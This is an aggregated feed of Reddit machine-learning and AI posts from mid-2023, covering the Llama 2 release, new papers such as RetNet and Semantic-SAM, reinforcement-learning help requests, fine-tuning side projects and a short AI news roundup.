    Hey r/MachineLearning, we've released tools that make it easy to test LLaMa 2 and add it to your own app! Model playground here: https://llama2.ai Hosted chat API here: https://replicate.com/a16z-infra/llama13b-v2-chat If you want to just play with the model, llama2.ai is a very easy way to do it. So far, we’ve found the performance is similar to GPT-3.5 with far fewer parameters, especially for creative tasks and interactions. Developers can: * clone the chatbot app as a starting point (https://github.com/a16z-infra/llama2-chatbot) * use the Replicate endpoint directly (https://replicate.com/a16z-infra/llama13b-v2-chat) * or even deploy your own LLaMA v2 fine tune with Cog (https://github.com/a16z-infra/cog-llama-template) Please let us know what you use this for or if you have feedback! And thanks to all contributors to this model, Meta, Replicate, the Open Source community! submitted by /u/Prestigious-Elk7124 [link] [comments]  ( 9 min )
    [Discussion] Meta open sources llama-2 and tie up with MSFT
    https://about.fb.com/news/2023/07/llama-2/ https://ai.meta.com/llama/ submitted by /u/Electrical_Study_617 [link] [comments]  ( 8 min )
    [N] Llama 2 is here
    Looks like a better model than llama according to the benchmarks they posted. But the biggest difference is that its free even for commercial usage. https://ai.meta.com/resources/models-and-libraries/llama/ submitted by /u/timedacorn369 [link] [comments]  ( 8 min )
    [D] Data Intelligence VS Information Retrieval
    I have to choose one of the two elective for the next sem. My Questions are: What is Information Retrieval and Data Intelligence? Which is more useful according to industry Requirements? Which one should I take as someone who wants to pursue a career as a Machine Learning Engineer or a Data Scientist? submitted by /u/Ethan045627 [link] [comments]  ( 8 min )
    [R] Utilizing AMD GPUs with Unity ML-Agents
    Hello everyone, I've embarked on a project involving Unity's ML-Agents toolkit, and I've hit a roadblock regarding GPU utilization. My system is equipped with an AMD GPU, and I'm aware that most machine learning libraries and tools mainly support NVIDIA GPUs due to their compatibility with CUDA. Has anyone here successfully gotten ML Agents to work optimally with an AMD GPU? If not, are there any alternative methods or libraries you recommend that work well with AMD GPUs? So far, my attempts with TensorFlow and PyTorch have been met with limited success due to their restricted support for AMD GPUs. I've been exploring other potential options like PlaidML and OpenCL, but I'd love to get some input from this community. Any suggestions or resources on tackling this issue would be hugely appreciated. Thank you! submitted by /u/Low-Spray-249 [link] [comments]  ( 9 min )
    [R] Relating images to voltages to angle
    If this post content is something you are expert in and would like to work with me to accomplish these goals as part of my team I am able to compensate you. I am currently building my team. I have pictures of a 3d printed part that I have sequentially lit by different small light sources, each positioned at a known 3d location relative to the part. The lights are less than 2 meters from the part. Each light casts specific shadows on the part. I measure the size of the shadows and relate them to the angular direction to the origin of the light (2D bearing). My next prototype has photodiodes that I will use to measure the % of shading on each diode by photoexcitation as a voltage. I want to build a pattern recognition model to relate the two outputs to the incident angle of light. This is so in the future I can output the bearing direction towards a light source with an unknown 3d relative position via voltage, and be able to validate the voltage data from images. Please guide me towards a Machine Learnig platform or engine (for lack of me knowing a better term) that could take this data (% surface shading & voltage) as input and learn how to extract the 2d bearing (and more) from sensor to light source. Thanks submitted by /u/masterjebbi [link] [comments]  ( 9 min )
    London AI4Code meetup w/ Aaron Parisi (Google) on TALM: Tool Augmented Language Models (July 27th) [R]
    The AI4Code reading group is back with Aaron Parisi, Google researcher and lead author of TALM, a framework for augmenting language models with arbitrary tools. Free RSVP: https://lu.ma/mw5ppi46 Paper: https://arxiv.org/abs/2205.12255 🗓 July 27th (Thursday) at 17:00 GMT+1 📍 Zoom 👥 Members of the international AI4Code research community Key ideas - Modeling tool-use via a text-to-text interface - Applying an iterative self-play technique to bootstrap high performance on tasks with few tool-use labelled examples TALM consistently outperforms a non-augmented LM on both a knowledge task (NQ) and reasoning task (MathQA). The AI4Code meetup community consists of like-minded researchers from around the world that network, discuss and share their latest research on AI applications on source code. submitted by /u/dritsakon [link] [comments]  ( 9 min )
    Image Recognition at Scale? [D]
    What services/libraries could I use if I wanted to, say, upload 100+ images and ask it to identify what each image is of? I know that in Bard for example I can upload one image at a time and it'll idenitfy it for me, but I want to do this at scale. Anyone know of any python libraries or OCR services that I could use for this? submitted by /u/Groundbreaking-Owl-5 [link] [comments]  ( 8 min )
    [D] How to access Claude AI outside US and UK
    Anthropic, a company founded by former researchers from OpenAI, has recently introduced its upgraded chatbot, Claude 2. Claude 2 has arrived five months after the initial release of its predecessor, Claude, and brings notable improvements such as longer responses, more up-to-date information, faster speeds. One of Claude 2's standout features is its ability to process up to 100,000 tokens, equivalent to 75,000 words, in a single prompt. This is a significant improvement from Claude's previous limitation of 9,000 tokens. However, there is one problem with it, currently Claude AI chat is available in UK and US only. While it’s claimed that other regions are soon to follow, the exact timeline remains unclear. Though Anthropic Claude is easily accessible with a VPN. Here are quick steps how to access it if you’re not living in UK or US: ​ 1. Buy a VPN provider of your choice that has in UK or US servers (most VPNs will have them since these are the main markets for them). This r/vpn comparison table could help you decide which provider to choose and offers nice discounts for some providers; 2. Open VPN app; 3. Connect to US or UK server. For the best speed and user experience, it’s recommended to connect to a server from whichever country is closer to your current location; 4. Login/Sign-up on Claude AI webpage. You can successfully log in using your personal email address. Using Incognito mode on your browser might be required; 5. Enjoy your easy access to Claude AI despite not being located in US or UK! ​ Hope this helps someone, happy using! submitted by /u/ProfessionalSource0 [link] [comments]  ( 9 min )
    [D] anyone got code implementation for hyperdreambooth
    i'm looking for code implementation of https://hyperdreambooth.github.io/ it'd be amazing if anyone can point to a repo or something thankyou submitted by /u/SayNo2Tennis [link] [comments]  ( 8 min )
    Sex differences in ML [D]
    General question about population stratification in machine learning: If I am interested in the important features for disease prediction in women only, is it worth stratifying my sample to women-only? I.e do ML algorithms account for gender differences? I have men and women in the dataset but I am interested in a disease that seems to be diagnosed in women later than men. submitted by /u/Vegetable-Gazelle728 [link] [comments]  ( 8 min )
    [R] Retentive Network: A Successor to Transformer for Large Language Models
    Paper: https://arxiv.org/abs/2307.08621 Retentive Network: A Successor to Transformer for Large Language Models Yutao Sun, Li Dong, Shaohan Huang, Shuming Ma, Yuqing Xia, Jilong Xue, Jianyong Wang, Furu Wei In this work, we propose Retentive Network (RetNet) as a foundation architecture for large language models, simultaneously achieving training parallelism, low-cost inference, and good performance. We theoretically derive the connection between recurrence and attention. Then we propose the retention mechanism for sequence modeling, which supports three computation paradigms, i.e., parallel, recurrent, and chunkwise recurrent. Specifically, the parallel representation allows for training parallelism. The recurrent representation enables low-cost O(1) inference, which improves decodin…  ( 10 min )
    [D] Vector DB Basics: a Star Wars Example
    Amidst all of the stress of AI taking over, here's a light-hearted blog post on Vector DB basics including a Star Wars mini-example for you all to enjoy :) https://preview.redd.it/n79cv8hkzocb1.png?width=1920&format=png&auto=webp&s=984d955c7d4a0e93ce36ca909835d98b65d6ee2d submitted by /u/kazhdan_d [link] [comments]  ( 8 min )
    [D] Derivation of InfoNCE loss
    I've been reading the paper that introduced Contrastive Predictive Coding as well as the InfoNCE section on Lilian Weng's blog post on contrastive learning. After a while of staring and working, I can't figure out how the authors derived equation 5 in the paper. The farthest I get is finding that p(d=i|X, c_t) = 1/(1 + \sum_{j=1, j!=i}^N [p(x_j | c_t) \prod_{l=1, l \neq j \neq i}^N p(x_l)]), but the rest of the derivation is a mystery to me. Is there something super obvious I'm missing? submitted by /u/like_a_tensor [link] [comments]  ( 8 min )
    [Discussion] State of highly specialized, topic-specific LLMS?
    Yesterday, I thought about why current conversational LLMs like ChatGPT are always so general. For example, I'm mostly working on Reinforcement Learning problems and would expect a model that is specifically fine-tuned on literature exclusively concerned with RL to give much better answers and more intricate details. ​ Are there any papers or blog posts about this? submitted by /u/seawee1 [link] [comments]  ( 8 min )
    [Research] Using official implementations vs highly popular unofficial implementation for research
    So for the past six months I have been working on a domain adaptation research problem. I wanted to inspect/understand the inherent capability of SSL methods to extract domain invariant features. For this purpose I have been conducting different kinds of experiments.There is a very nice library called lightly that contains the implementations of all published SSL methods, This made things very easy for me in terms of writing code. I am not a PhD student or don't have significant research experience. My guide/mentor is very interested in the work I'm doing and she aims to publish our work in somewhere like a NeurIPS, ICML or so. Probably because of my lack of experience, I am overlooking into things or I am genuinely concerned. I just don't want to make stupid coding or code related errors and report wrong results. I just want to know if its mandatory to use the official implementations of every method I'm benchmarking.or example, SimCLR's official implementation is in Tensorflow and I am using PyTorch. Using official implementation would introduce these kind of bottlenecks and slow down my experimentation process. Any advices on this would be greatly appreciated. Thanks. submitted by /u/ashharsha [link] [comments]  ( 9 min )
    [D]💥 How Underdog AI Companies Will Crush Silicon Valley Giants.
    💥 How Underdog AI Companies Will Crush Silicon Valley Giants. Opportunities in AI: Creating Abundant Intelligence. Generative AI like ChatGPT brings complex tasks within reach and is set to transform society. Startups have an opportunity in applying AI to create "abundant intelligence". In the past year, ChatGPT, GitHub Copilot, and Midjourney have rapidly grown to $100M+ revenue. AI startups face competition from tech giants also moving quickly into AI. Startups must pick spots where they have an advantage. Opportunities exist in expanding the application universe into new greenfield opportunities like automating mundane decisions, masking workflow complexity, and reimagining applications. Infrastructure tools make models more powerful by chaining them together and improving accuracy. Opportunity areas include unstructured data management, agent-driven automation, model evaluation, and experimentation. Key players emerging are foundation model providers like OpenAI and Anthropic, companies building domain-specific models, and platforms for autonomous agents. Advantages exist for startups focused on imagination and technical ability to find non-obvious ideas, while large companies retrofit existing businesses. submitted by /u/Yavero [link] [comments]  ( 9 min )
    [R] Semantic-SAM: Reproduce and Beyond SAM with Semantic-Aware and Granualrity-Abundance
    We introduce Semantic-SAM, a universal image segmentation model to enable segment and recognize anything at any desired granularity. We have trained on the whole SA-1B dataset and our model can reproduce SAM and beyond it. Training and inference code is available! 🔥code & demo link: https://github.com/UX-Decoder/Semantic-SAM 🔥paper link: https://arxiv.org/pdf/2307.04767.pdf 🚀 Features 🔥 Reproduce SAM. SAM training is a sub-task of ours. We have released the training code to reproduce SAM training. 🔥 Beyond SAM. Our newly proposed model offers the following attributes from instance to part level: Granularity Abundance. Our model can produce all possible segmentation granularities for a user click with high quality, which enables more controllable and user-friendly interactive s…  ( 9 min )
  • Open

    What phenomena are hyperparameters supposed to capture?
    Suppose you have an IMU and therefore no way to track velocity (reliably). In simulation you can train with velocity in any way you like. In this case, what is velocity in this context. Can it be used in the reward function as a form of privileged info or is it a hyperparameter (and needs an outer loop for optimization)? This is just an example of a problem for sim-2-real but that question applies generally for hyperparameters in terms of the objective. submitted by /u/FriendlyStandard5985 [link] [comments]  ( 8 min )
    Intro to Vanilla Policy Gradient
    I've written a series of blog posts going into the theory behind the policy gradient algorithm. Anyone who's starting out in RL may find them to be a good introduction! If you want to understand PPO and various actor critic algorithms, this is the place to start. https://kjabon.github.io/blog/2023/VPG/ ​ Let me know if you spot any issues or have any questions. (You can also comment on the post itself, I'll see it). submitted by /u/kjabon [link] [comments]  ( 8 min )
    RL applications
    So I am aware of applications of RL in games and robotics, as well as applications of contextual bandits for recommender systems. But as I look for possible future research paths in RL, I was wondering if there were any other interesting applications of the field. For instance, I recently learned about RL in procedural content generation. I’m particularly interested in more accessible/less resource heavy ones, though I would be glad to learn about all of them. Any insight and resources on this topic will be greatly appreciated. submitted by /u/Ok_Signature_4944 [link] [comments]  ( 8 min )
    "GKD: Generalized Knowledge Distillation for Auto-regressive Sequence Models", Agarwal et al 2023
    submitted by /u/gwern [link] [comments]  ( 8 min )
    Question about Montezuma's Revenge gym Atari environment
    Hi all, ​ I'm running some code (this code, in case anyone's curious) training an agent to learn in Montezuma'sRevengev4NoFrameskip environment, and it seems to be working, but the nonzero rewards seemingly being returned by the environment are always 1, rather than the "100" or "1000" points that are supposedly returned by the game. I'd like to change this so I can compare to SOTA benchmarks, which seem to use the actual game score, but also because I want to make sure this isn't a bug or anything. As far as I can tell, the reward of "1" is coming from the environment itself, and not from the code I linked converting any nonzero reward to a 1, but I can't find anything stating that in the documentation I can find, and might be missing something. Does anyone else have more experience with this environment that could tell me what's causing this/is it normal? submitted by /u/LessPoliticalAccount [link] [comments]  ( 9 min )
    Looking for assembly game environments
    Hello, I am really impressed by the real-life applications of Alphadev. I would like to experiment with an assembly game myself, but to the my best knowledge, it appears that there is no representative environment available. Is there an assembly game environment that you would recommend for reinforcement learning experiments? submitted by /u/Spiritual_Fig3632 [link] [comments]  ( 8 min )
    Looking for assembly game environments
    Hello, I am really impressed by the real-life applications of Alphadev. I would like to experiment with an assembly game myself, but to the my best knowledge, it appears that there is no representative environment available. Is there an assembly game environment that you would recommend for reinforcement learning experiments? submitted by /u/Spiritual_Fig3632 [link] [comments]  ( 8 min )
    For OpenAI Humanoid-v4: is 20000 score (average of last 250 episodes) within 3800 episodes good score for offline RL?
    Do I need to register it somewhere? If people got more than that, ok no multi-agents log: https://preview.redd.it/jf91dab7encb1.png?width=720&format=png&auto=webp&s=89d737fc1f30a6f9ef96575e18e0b8993ba683fd submitted by /u/Timur_1988 [link] [comments]  ( 8 min )
    Help
    Hi, I was implementing actor critic algorithm and while running it on cartpole environment, I noticed that if i repeat the same experiment, I would get the exact same results(overlapping plots of actor/critic loss, average return etc). Is it possible as the initialisation should be different for each run? Maybe because the environment is not stochastic? submitted by /u/Interesting-Weeb-699 [link] [comments]  ( 8 min )
    "AlpaGasus: Training A Better Alpaca with Fewer Data", Chen et al 2023 {Samsung}
    submitted by /u/gwern [link] [comments]  ( 8 min )
    Multi agent reinforcement learning - help wanted
    Hi guys, thank you in advance to who's going to answer. I'm researching MARL and drones swarms for my master thesis. Drones should navigate in a map, avoiding obstacles and finding a target, just using an RGB camera. If a drone collides/reaches objective, must stop but the episode will conclude when all of them finish. I had successfully implemented a single drone env using Microsoft's AirSim, which converges in less than 100k steps using SB3's PPO. Anyway, I need to do the same for a multiagent env. I tried a multitude of frameworks, RLlib (which didn't work well), MARLlib (got a successful implementation, but didn't like it and didn't have much results) and now I'm using SB3+PettingZoo ParallelEnv+SuperSuit. I can easily train the env, but after 1 million steps I still do not get any improvement (see attached pic): some problems are that evaluation episodes sometimes end before all the drones collide/reach objective; I had to modify SuperSuit package because didn't really support well black death on Markov wrapper (when drone is not active, his camera observation is all 0s and actions are not given); evaluation seems to behave differently than training (actions seem "smoothed", almost 0, in particular at the first evaluations episodes); drones seem to behave better (reach easily objective) if all the others collided. If any of you are interested, I can attach some code. I had to heavily modify the overrid step function of the Parallel env to support training on active agents only (possible_agents variable). I was inspired by this stack overflow: https://stackoverflow.com/questions/73111772/problem-with-pettingzoo-and-stable-baselines3-with-a-parallelenv If you have any advice, any different framework to try (I should try Tianshou's), please tell me. Any help is greatly appreciated. Thank you all. submitted by /u/IntelligentAd6407 [link] [comments]  ( 9 min )
  • Open

    Personal Assistant AIs?
    What does the market look like for personal assistant AIs? I was looking at trying to code one for myself or try to get a group of my coding friends to help make one up so we can use it for ourselves to make our lives easier. Not sure if this really exists now though. submitted by /u/derpgod123 [link] [comments]  ( 8 min )
    What is the best free AI picture generator available?
    Preferably something that allows NSFW requests. submitted by /u/Ancient_Challenge173 [link] [comments]  ( 8 min )
    Meta/Facebook just released Llama2
    submitted by /u/swierdo [link] [comments]  ( 8 min )
    Google bard uses Deviantart, Quora, Reddit as source for it's opinions
    submitted by /u/TruestNestor [link] [comments]  ( 8 min )
    Microsoft Inspire AI megathread!
    Starting now submitted by /u/jaketocake [link] [comments]  ( 8 min )
    Here's What Barbie Would Look Like In Every Country
    submitted by /u/World-Tight [link] [comments]  ( 8 min )
    Open source project to generate speech from text with emotion. Are there any?
    I forget what the technical term is, but there are professional tools that can adjust tone/pressure of the speech to generate an emotional voice. Imagine a guy having to stop playing xbox because dinner is ready and he goes “but moooOoOoom, I’m in the middle of a quest. Hhhhng”. I want to be able to generate that. I don’t mind adding annotations for this but I have yet to find a usable open source project that does this. Are there any? (Oh yeah, and I want to make sexy talk. So it’s for porn, it was always about porn. kudos if you’ve guessed it already). submitted by /u/kjarkr [link] [comments]  ( 8 min )
    Mind-Blowing Midjourney Animated Audiobook
    Just wanted to share with you an ongoing project that uses AI to enhance the way we are creating stories. Of you have questions let me know. submitted by /u/Pa7adox [link] [comments]  ( 8 min )
    Claude 2 creative writing is lit.
    Made this using claude 2 Prompt: A fight between Shazam and Constantine Results: Here is a very lengthy and detailed description of a fight between Shazam and Constantine: The skies over Gotham City darkened as thunderclouds rolled in, foretelling the epic battle about to unfold. A crack of lightning split the sky and Shazam descended, his red costume blazing like fire, his white cape billowing behind him. His eyes scanned the streets below, searching for his opponent, the cunning magician John Constantine. Constantine stepped out from the shadows of a nearby alley, cigarette dangling from his lips, tan trenchcoat dusty and worn. His hands slid into his pockets and he stared up defiantly at the hero hovering above. "Took you long enough to get here, mate," Constantine called out, his B…  ( 16 min )
    Which AI content creators do you follow?
    There are so many “AI influencers” who are suddenly experts or claim to have the perfect ChatGPT prompt despite no prior involvement in the AI space. Which AI content creators and leaders do you actually follow and learn from? Can include any platforms: Twitter, LinkedIn, YouTube, TikTok, email newsletter, etc. submitted by /u/tridoc [link] [comments]  ( 8 min )
    Ai vedios
    Can you help me find alternatives for heygen and d-id studio cause I need to make the wheels or shorts for social media that pretty much going viral nowadays submitted by /u/Aggressive-Still-886 [link] [comments]  ( 8 min )
    I did it
    submitted by /u/plauge1_ [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/17/2023
    With generative AI becoming all the rage these days, it’s perhaps not surprising that the technology has been repurposed by malicious actors to their own advantage, enabling avenues for accelerated cybercrime. According to findings from SlashNext, a new generative AI cybercrime tool called WormGPT has been advertised on underground forums as a way for adversaries to launch sophisticated phishing and business email compromise (BEC) attacks.[1] A.I. is a $1 trillion investment opportunity but will be ‘biggest bubble of all time,’ Stability AI CEO Emad Mostaque predicts.[2] The Israel Defense Forces have started using artificial intelligence to select targets for air strikes and organize wartime logistics as tensions escalate in the occupied territories and with arch-rival Iran.[3] MIT researchers have developed PIGINet, a new system that aims to efficiently enhance the problem-solving capabilities of household robots, reducing planning time by 50-80 percent.[4] Sources: [1] https://thehackernews.com/2023/07/wormgpt-new-ai-tool-allows.html [2] https://www.cnbc.com/2023/07/17/ai-will-be-the-biggest-bubble-of-all-time-stability-ai-ceo.html [3] https://www.bloomberg.com/news/articles/2023-07-16/israel-using-ai-systems-to-plan-deadly-military-operations?in_source=embedded-checkout-banner [4] https://interestingengineering.com/innovation/ai-household-robots-problem-solving-skills submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
  • Open

    DSC Weekly 18 July 2023
    Announcements Top Stories In-Depth The post DSC Weekly 18 July 2023 appeared first on Data Science Central.  ( 20 min )
    Leveraging AI for smarter electronic data interchange
    Electronic Data Interchange (EDI) can be traced back to the late 1960s and early 1970s when businesses began to seek more efficient ways to exchange data electronically. Consequently, the concept of using computers to transmit and receive business documents emerged, aiming to replace manual paper-based processes. Then in the 1980s, standards organizations such as ANSI… Read More »Leveraging AI for smarter electronic data interchange The post Leveraging AI for smarter electronic data interchange appeared first on Data Science Central.  ( 20 min )
  • Open

    SimPer: Simple self-supervised learning of periodic targets
    Posted by Daniel McDuff, Staff Research Scientist, and Yuzhe Yang, Student Researcher, Google Learning from periodic data (signals that repeat, such as a heart beat or the daily temperature changes on Earth’s surface) is crucial for many real-world applications, from monitoring weather systems to detecting vital signs. For example, in the environmental remote sensing domain, periodic learning is often needed to enable nowcasting of environmental changes, such as precipitation patterns or land surface temperature. In the health domain, learning from video measurement has shown to extract (quasi-)periodic vital signs such as atrial fibrillation and sleep apnea episodes. Approaches like RepNet highlight the importance of these types of tasks, and present a solution that recognizes rep…  ( 92 min )
  • Open

    Filtering on how words are being used
    Yesterday I wrote about how you could use the spaCy Python library to find proper nouns in a document. Now suppose you want to refine this and find proper nouns that are the subjects of sentences or proper nouns that are direct objects. This post was motivated by a project in which I needed to […] Filtering on how words are being used first appeared on John D. Cook.  ( 5 min )
    Forever chemicals and blood donation
    I saw a headline saying that donating blood lowers the level of forever chemicals in your body. This post will give a back-of-the-envelope calculation to show that this idea is plausible. Suppose there are chemicals in your bloodstream that do not break down and that your body will not filter out. Suppose you have about […] Forever chemicals and blood donation first appeared on John D. Cook.  ( 5 min )
  • Open

    Llama 2
    submitted by /u/nickb [link] [comments]  ( 8 min )
    How can MeanSquaredError be possibly so bad?
    My neural networks predicts values in range [-1, 1]. I am using mean squared error as my loss function, and I am quite surprised it yields values as high as 1.7. (Just to be clear labels are also in range [-1,1].) I am using tanh as my activation function of the output layer. I understand it as extremely bad sign, since even if it always predicted middle value (0), MSE could never be > 1, right? It almost seems like that taking the opposite values would show better results? If I understand this right, how is that even possible that a network can be trained and perform so horribly? submitted by /u/DDDDarky [link] [comments]  ( 8 min )
    Reconstructing the Mind’s Eye: fMRI-to-Image with Contrastive Learning and Diffusion Priors
    submitted by /u/nickb [link] [comments]  ( 8 min )
  • Open

    Reborn, Remastered and Remixed: ‘Portal: Prelude RTX’ Rejuvenates Legendary Gaming Mod
    The “Portal: Prelude RTX” gaming mod — a remastering of the popular unofficial “Portal” prequel — comes with full ray tracing, DLSS 3 and RTX IO technology for cutting-edge, AI-powered graphics that rejuvenate the legendary mod for gamers, creators, developers and others to experience it anew.  ( 7 min )
  • Open

    Partnership with American Journalism Project to support local news
    A new $5+ million partnership aims to explore ways the development of artificial intelligence (AI) can support a thriving, innovative local news field, and ensure local news organizations shape the future of this emerging technology.  ( 3 min )
  • Open

    A faster way to teach a robot
    A new technique helps a nontechnical user understand why a robot failed, and then fine-tune it with minimal effort to perform a task effectively.  ( 9 min )

  • Open

    [P] LLM to simulate a character
    I'm working on building an application and I want to have a chatbot that has the opinions and thoughts of a particular person. I want to train this on my own. I have a large corpus of data that I can use for this training. I am not sure which existing foundation model / model architecture I should use for training this. I fine-tuned a GPT2 model earlier but the results were very poor. Maybe it has to do with the data? submitted by /u/MethodExtension5513 [link] [comments]  ( 8 min )
    [N] FlashAttention-2: Faster Attention with Better Parallelism and Work Partitioning
    Twitter thread: https://twitter.com/tri_dao/status/1680987577913065472 Tech report: https://tridao.me/publications/flash2/flash2.pdf submitted by /u/SchmidhuberDidIt [link] [comments]  ( 8 min )
    [R] Clustering of X shaped data
    I have a dataset with two variables and 500 observations. They plot like an X shape. I have been trying to find a clustering method to identify the two lines forming the X as two different clusters. All the methods I tried so far (K_means, DBSCAN, Spectral clustering) identified the two angles forming the X as the two differebt clusters. Any ideas on how to approach this? Any help would be appreciated. Thanks! submitted by /u/earthlingsapien [link] [comments]  ( 8 min )
    [P] GeoSegment Demo - Segment Anything Model for Geospatial Data (running purely in the browser)
    I’ve been working on a side project that utilises the segment anything model for satellite imagery, but allowing it to run purely as a web application (no need to run the model locally on a powerful PC). The intention is to provide a quick and easy “AI assisted” way to segment imagery and save time on digitisation tasks, and then export it to your GIS application of choice (QGIS or ESRI software support the export format, which is GeoJSON). The demo video is here If anyone wants access to the online demo shown in the video, just message me and I can give you the link and demo credentials. I’m hoping there is some use for it to GIS folks :) submitted by /u/CharlieTheChooChooo [link] [comments]  ( 9 min )
    [D] How does Claude parse attached documents?
    I played with Claude 2 this weekend and overall really impressed, especially for summarizing pdfs and other text documents. I gave it Microsoft's Q2 financial statement, and Claude did a good job with most questions, including over tabular data. Anyone know how it parses tabular data from documents? I can see the extracted lines but wondering how they get used. Is there a preprocessing step of creating embeddings from it? https://preview.redd.it/4fnjn477vkcb1.png?width=1200&format=png&auto=webp&s=fa235bbcbd4d2954fae5908a904cd5d7f17658c8 Some more details from my experiment in this thread. submitted by /u/sarmad-q [link] [comments]  ( 8 min )
    [P] LoopGPT Update - Finally something useful?
    By now, most of us who tried have realized that the "autonomous LLM agents" are not really useful at the moment. We need to create applications that are helpful, predictable and reliable that will produce acceptable results, in place of endless toil to get these agents to do something. We really just need good, specific LLM products that can do at least one thing properly, like - doing some research, writing a report, summarizing content - things an LLM might actually be good at. So we thought it would be a good idea to create a framework that makes use of LoopGPT agent's memory and custom tooling capabilities. Let's jump right into the new features of this framework. First, using LLMs within Python functions, where you only write the function's docstring and the LLM will return the resu…  ( 10 min )
    [D] Machine Learning: The Silent Revolution in Our Midst
    Hello, fellow machine learning aficionados! As everyone is aware, machine learning is transforming a wide range of sectors, including healthcare, banking, entertainment, and transportation. But have you ever stopped to think about the more subtle effects it's causing in our day-to-day activities? Think about this Machine learning is the technology behind the targeted advertisements you see online, the intelligent email client suggestions for replies, the traffic predictions on your GPS, and even the song suggestions on your favorite music app. But this is where things become intriguing. I'm interested in hearing about the most imperceptible yet significant ways you've seen machine learning in action in your day-to-day activities. It could be as straightforward as a practical component in an app you frequently used or a big shift in your work process. Here's my observation to start the discussion: Thanks to machine learning, I've seen that over time, my smart home appliances have gotten better at comprehending my orders. I now seldom ever have to repeat myself, and it seems like the gadgets are actually "learning" what I want. I'm eager to hear your insights. Let's explore machine learning's covert revolution together, eh? submitted by /u/HungryGuidence [link] [comments]  ( 9 min )
    [P] OnnxStream: running Stable Diffusion in 260MB of RAM
    hi all, I developed a small inference library in C++ that can run Stable Diffusion in 260MB of RAM. The minimum recommended RAM/VRAM for SD is 8GB. This is achieved by offloading the weights on disk, by quantization and attention slicing (which is similar in principle to FlashAttention, without the fused kernel). It currently supports 24 ONNX operators. The idea is to allow the inference of very large (transformer) models on very limited devices. More info in the GitHub repo: https://github.com/vitoplantamura/OnnxStream Thanks, --Vito submitted by /u/Pristine198 [link] [comments]  ( 8 min )
    [D] Optimizing AI prompt
    Hey, everyone! Been thinking about how we interact with AI, especially in the realm of text generation. It's no secret that the way we prompt an AI greatly influences the output. A perfectly crafted prompt can result in a well-constructed piece of writing, while a vague or poorly worded one might leave us with gibberish or content that misses the mark. Recently, I've been intrigued by the idea of 'Prompt Engineering.' We've seen AI models grow more powerful, more human-like, and they're getting involved in content creation in a big way. There are AI-powered tools and applications being used in journalism, blogging, script writing, technical writing, and so much more. With the rise of powerful models like GPT-3.5, DALL-E 2, and others, it seems the ability to create optimal prompts has become an art and science unto itself. What's your take on this? Do you think there's value in perfecting the art of prompting AI? Or do you feel AI should evolve to understand human language and context better, regardless of how a question or command is framed? Could the emergence of intuitive tools that assist with prompt optimization help bridge this gap, making AI-generated content more accessible and higher quality? As content creators, developers, or just AI enthusiasts, how do you think this will shape the future of AI-generated content? submitted by /u/IntentlyConscious [link] [comments]  ( 9 min )
    [P] Chapyter: ChatGPT Code Interpreter in Jupyter Notebooks
    I recently made a new JupyterLab extension called Chapyter (𝐂𝐡𝐚ts in Ju𝐏𝐲𝐭𝐞𝐫) that aims at solving many pain points when using other AI coding assistants. I want to share with y'all the tools as well as my thinkings while building this. What is Chapyter Chapyter is a JupyterLab extension that seamlessly connects GPT-4 to your coding environment. Here are the key features: Code generation from natural language and automatic execution Simply adding the magic command %%chat at the beginning of the cell of a natural language description of the task, the code is generated and the results are shown in a few seconds. https://i.redd.it/y7l0s9pf5hcb1.gif Using coding history and execution output for code generation By adding the --history or -h flag in generation, chapyter can…  ( 10 min )
    [P] Finetuning qLoRAs for production use cases - Paraphrasing, Changing the tone of a sentence, Dialogue Summarization and Topic generation
    Hello, I've been curious as to how far we can take small(7B and less) models for production use cases with small amounts of training data for each task. So far I've been able to fine-tune LoRAs for paraphrasing, changing the tone of a sentence, dialogue summarization and topic generation. The results look promising, especially the fact that all this can run on very modest hardware. Finetuning was done in 4bit mode using bitsandbytes. Each task had ~1k training points. I've used a AMD Ryzen9 3900XT + 3080(10gb) + 32gb ram for all the training and inference here. On my system I get 12-15 tokens/sec during inference. All the details can be found here: https://github.com/kuutsav/llm-toys. Data used for training Training params and the training/eval losses are present in the huggingface model cards Evaluation(wherever possible atm) Models: https://huggingface.co/llm-toys Why do all this? Mostly to answer the question - can we move away from OpenAI and other players for very particular use cases, how much data it takes, where does it break, etc. So far I've not been able to find pre-trained model(7b and small) that did well on these tasks. Even larger models(around 40b) failed to give consistent results. The fine-tuned model on huggingface were also not good enough in my trials. For paraphrasing I could not find even a single fully tuned model that was able to correct basic typos. Do give it a shot, there is a colab notebook available as well try it directly. Will really appreciate some feedback on these model's performace. submitted by /u/krumb0y [link] [comments]  ( 9 min )
    [P] Innovative Project : Blockchain Anomaly Detection System - DeHack
    We're DeHack, a Web 3.0 security startup in Dubai. We're looking for a Machine Learning enthusiast who understands blockchain. Part-time or full-time. We're the team behind BlockAudit, now building DeHack - Threat intelligence and mitigation product. We're at an exciting stage with venture funding talks underway. It's a huge opportunity for someone who wants to work at the intersection of ML & Web 3.0. If you've worked on Threat Anomaly detection models, even better. For the perfect fit, we're open to discussing equity compensation as part of the package. Sounds interesting? Get in touch! www.DeHack.ai akshay@dehack.ai TG: u/DeHack_Akshay submitted by /u/Ok_Ear_7544 [link] [comments]  ( 8 min )
    How best to benchmark the accuracy of a model for comparing different tokenizers? [D]
    I need to benchmark the performance of my tokenizer against standard tokenizers. It would be best for reproducibility if I benchmark against an existing model on a standard benchmark, swapping out the existing tokenizer for my tokenizer. I was planning to train TinyStories model for the comparison, but what would I benchmark other than perplexity? Is comparing perplexity enough to benchmark the performance of two models trained on the same dataset? Or what is best for that? Can anyone recommend a repo (if any exist) that: Pretrains a transformer based model from scratch. Has some kind of accuracy benchmark that will be taken seriously. Can be modified to use a different tokenizer. Can be pretrained on an RTX 3090 within 24-48 hours. If there's a repo somewhere that both pretrains on a benchmark dataset and applies a suitable benchmark automatically that would be amazing. As you can tell I'm unsure how best to go about doing the benchmark. Any advice would be appreciated. submitted by /u/Pan000 [link] [comments]  ( 9 min )
    [R] Prompt Performance Prediction
